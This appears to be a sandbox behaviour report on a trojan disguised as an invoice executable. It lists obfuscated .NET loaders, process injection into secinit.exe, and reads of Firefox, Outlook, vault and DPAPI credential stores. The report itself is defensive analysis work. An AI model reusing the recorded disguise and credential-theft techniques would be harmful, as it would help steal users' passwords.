                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032BD8006_2_032BD800
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032538E06_2_032538E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FF096_2_0330FF09
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FFB16_2_0330FFB1
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03251F926_2_03251F92
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03213FD26_2_03213FD2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03213FD56_2_03213FD5
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03259EB06_2_03259EB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03307D736_2_03307D73
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03253D406_2_03253D40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03301D5A6_2_03301D5A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326FDC06_2_0326FDC0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032C9C326_2_032C9C32
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FCF26_2_0330FCF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AD1E906_2_02AD1E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACAF606_2_02ACAF60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACCF706_2_02ACCF70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACCD476_2_02ACCD47
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACCD506_2_02ACCD50
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACB0AF6_2_02ACB0AF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACB0B06_2_02ACB0B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACB0F96_2_02ACB0F9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AD36FB6_2_02AD36FB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AD37006_2_02AD3700
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AD55006_2_02AD5500
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AEBB906_2_02AEBB90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0356E2C36_2_0356E2C3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0356E1A46_2_0356E1A4
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0356D7286_2_0356D728
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0356E65C6_2_0356E65C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe | Code function: String function: 0162B970 appears 280 times
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe | Code function: String function: 016AEA12 appears 86 times
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe | Code function: String function: 01687E54 appears 111 times
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe | Code function: String function: 016BF290 appears 105 times
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe | Code function: String function: 01675130 appears 58 times
                Source: C:\Windows\SysWOW64\secinit.exe | Code function: String function: 03297E54 appears 111 times
                Source: C:\Windows\SysWOW64\secinit.exe | Code function: String function: 032CF290 appears 105 times
                Source: C:\Windows\SysWOW64\secinit.exe | Code function: String function: 0323B970 appears 280 times
                Source: C:\Windows\SysWOW64\secinit.exe | Code function: String function: 03285130 appears 58 times
                Source: C:\Windows\SysWOW64\secinit.exe | Code function: String function: 032BEA12 appears 86 times
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000002.1420525696.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000002.1422967015.0000000006E60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000000.1388796538.0000000000730000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameztaV.exe@ vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000002.1423761452.00000000079F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000002.1418547740.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.000000000172D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesecinitj% vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe | Binary or memory string: OriginalFilenameztaV.exe@ vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: INVOICE, PACKING LIST, COPY BL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, YudlFeIlxJFsmZRCjZ.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, YudlFeIlxJFsmZRCjZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, YudlFeIlxJFsmZRCjZ.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, YudlFeIlxJFsmZRCjZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@6/5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE, PACKING LIST, COPY BL.exe.log
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\secinit.exe | File created: C:\Users\user\AppData\Local\Temp\472E1186
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1946377767.0000000002D33000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2641601175.0000000002D25000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1944117122.0000000002D04000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1944294597.0000000002D25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: INVOICE, PACKING LIST, COPY BL.exeReversingLabs: Detection: 47%
                Source: INVOICE, PACKING LIST, COPY BL.exeVirustotal: Detection: 32%
                Source: unknownProcess created: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe"
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess created: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe"
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: mscoree.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: riched20.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: usp10.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: msls31.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: dwrite.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: amsi.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: userenv.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: gpapi.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: textshaping.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\secinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: secinit.pdbGCTL source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000002.2642194522.000000000155E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.0000000001600000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1752868899.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.0000000003210000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1756481965.0000000003064000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: INVOICE, PACKING LIST, COPY BL.exe, INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.0000000001600000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 00000006.00000003.1752868899.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.0000000003210000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1756481965.0000000003064000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000002.2642194522.000000000155E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 2zqVCuEmR.exe, 00000005.00000002.2641515194.0000000000E2F000.00000002.00000001.01000000.0000000C.sdmp, 2zqVCuEmR.exe, 00000007.00000002.2643227394.0000000000E2F000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.cs.Net Code: CMeBfvN5Or System.Reflection.Assembly.Load(byte[])
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.cs.Net Code: CMeBfvN5Or System.Reflection.Assembly.Load(byte[])
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.6e60000.3.raw.unpack, MainForm.cs.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07054133 push ecx; ret 0_2_07054134
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0041F003 pushfd ; iretd 3_2_0041F01B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00414086 push esi; ret 3_2_00414095
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00417939 push FFFFFFD7h; retf 3_2_0041793E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040DA26 push es; iretd 3_2_0040DA2E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00418AD8 pushad ; iretd 3_2_00418ADF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0041940F push edx; ret 3_2_00419411
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00419416 push edi; retf 3_2_00419417
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004075C0 push esi; retf 3_2_004075C8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040AD9E push ebp; retf 3_2_0040AD9F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040D5AD push 43AEBFE9h; ret 3_2_0040D5B9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00418654 push ds; ret 3_2_00418656
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00403660 push eax; ret 3_2_00403662
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00401669 push eax; retf 3_2_0040166A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040760B push ebx; iretd 3_2_0040760D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0041D612 pushfd ; ret 3_2_0041D620
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00414EC6 push esp; ret 3_2_00414EC7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00401FEE pushad ; retf 3_2_00401FEF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0160225F pushad ; ret 3_2_016027F9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016027FA pushad ; ret 3_2_016027F9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016309AD push ecx; mov dword ptr [esp], ecx 3_2_016309B6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0160283D push eax; iretd 3_2_01602858
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01601328 push eax; iretd 3_2_01601369
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB7DB7 push esi; ret 5_2_04FB7DC6
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FC2D34 pushfd ; iretd 5_2_04FC2D4C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBB66A push FFFFFFD7h; retf 5_2_04FBB66F
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB1757 push es; iretd 5_2_04FB175F
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBC809 pushad ; iretd 5_2_04FBC810
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBD140 push edx; ret 5_2_04FBD142
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBD147 push edi; retf 5_2_04FBD148
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FAB2F1 push esi; retf 5_2_04FAB2F9
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: section name: .text entropy: 7.667158912734943
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, HRRyNLWP3aCReQ34uIv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mQCZ9TRMtM', 'NtnZGrTLNk', 'diQZMWDybW', 'eayZVRvoy9', 'JSGZj6ll1u', 'WUnZnY0KY5', 'QcZZm7IwWc'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, YudlFeIlxJFsmZRCjZ.csHigh entropy of concatenated method names: 'sSRRV5JD0J', 'GDTRj4TWu7', 'TriRntCfGT', 'H5WRm3GqQL', 'SL9RFuUAK4', 'lMORQXvrt4', 'AfKRLay188', 'll9ROSSyjx', 'kmmR53lNfx', 'iedRq0TnZj'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, zUdOj2YCX8SVbVqi5j.csHigh entropy of concatenated method names: 'ro6kTTBg4h', 'C1KkoRtHCt', 'Td9kftfJxN', 'NUYkbXtVSy', 'OjJkpopJx8', 'sdkkyubeJa', 'qyBk0J7DNC', 'VlWkIiqlPL', 'w38kaiFMFR', 'FIqkSi2NSA'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, gX0RypnLwsmDbqthTf.csHigh entropy of concatenated method names: 'ToString', 'DrSK9NAo3q', 'ufvKUQm8Pm', 'ExTK14ADWW', 'JviKrpjcYv', 'PHLKC3HVV8', 'UB0Kif8WXu', 'fVtK3Jxfgq', 'rIoKEcUGGh', 'RXbKYig7AH'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, C6biJfSm4Srs3LV1MC.csHigh entropy of concatenated method names: 'esthpy5d4G', 'OkZh0GTHKt', 'GSEX10Cq9p', 'KVXXrI9p2Q', 'BS6XCC6TEY', 'g8kXiRnUYy', 'XnRX3Za7mO', 'g5bXE4yyLT', 'DDsXYDAWoD', 'pMkX2C72ov'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, aXR38bWBo0XaIiEmX5D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Om2xvGX5Up', 'Ol6xZVdvrS', 'nlmxgMW2YE', 'Vkpxxb7feD', 'IkFx4apv2Z', 'HYjxuJoh8L', 'Vi3xA4Lmjl'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, JF6ugEDBOHDgiaJMAa.csHigh entropy of concatenated method names: 'Iwef4FhDu', 'qwhbvTvIv', 'sqxylHgKU', 'QLu0V5lA7', 'Fa2aFCBoq', 'cAhSFddOc', 'e91DE6EfnT4EWybjMB', 'sri9f75abKEcGNrMRf', 'dZ0NsxXDv', 'U5aZXKOI4'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, VAmO9CMD1lR5QC0SBA.csHigh entropy of concatenated method names: 'QRAeITsrJ7', 'iqmeaoKOMR', 'IL0esM45B1', 'xGieUG3oPI', 'FnQerAgbU4', 'wBteCeY9oO', 'GOMe3aCFBk', 'cG6eEISJgA', 'bK0e2QkLU2', 'e2we9fbgnU'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.csHigh entropy of concatenated method names: 'RuL6tIwLeC', 'RWk68N7EYP', 'LYq6R53mip', 'oHm6XECYMf', 'HS76hPrBjY', 'qNy6dqBpHj', 'vbo6kj73Kn', 'IRT6lWRtcK', 'uO16Ju1ZtE', 'JwJ6cFT3Co'
